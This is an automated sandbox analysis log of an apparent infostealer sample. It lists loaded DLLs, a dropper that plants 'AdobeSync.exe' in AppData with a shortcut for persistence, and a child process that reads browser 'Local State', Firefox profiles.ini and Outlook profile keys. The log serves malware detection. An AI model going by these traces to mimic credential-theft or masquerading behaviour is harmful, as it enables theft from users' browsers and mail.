Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: axe8sharedexpat.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: bib.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: sqlite.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: axe8sharedexpat.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: bib.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: sqlite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: axe8sharedexpat.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: bib.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: sqlite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: bgwf.5.drLNK file: ..\..\..\..\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: LVkAi4PBv6.exeStatic file information: File size 7012811 > 1048576
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile opened: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dllJump to behavior
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LVkAi4PBv6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LVkAi4PBv6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: [C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\\CRX_INSTALL\content_scripts source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ^\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb9 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: >C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb* source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\RX_INSTALL\_locales source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2~ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, 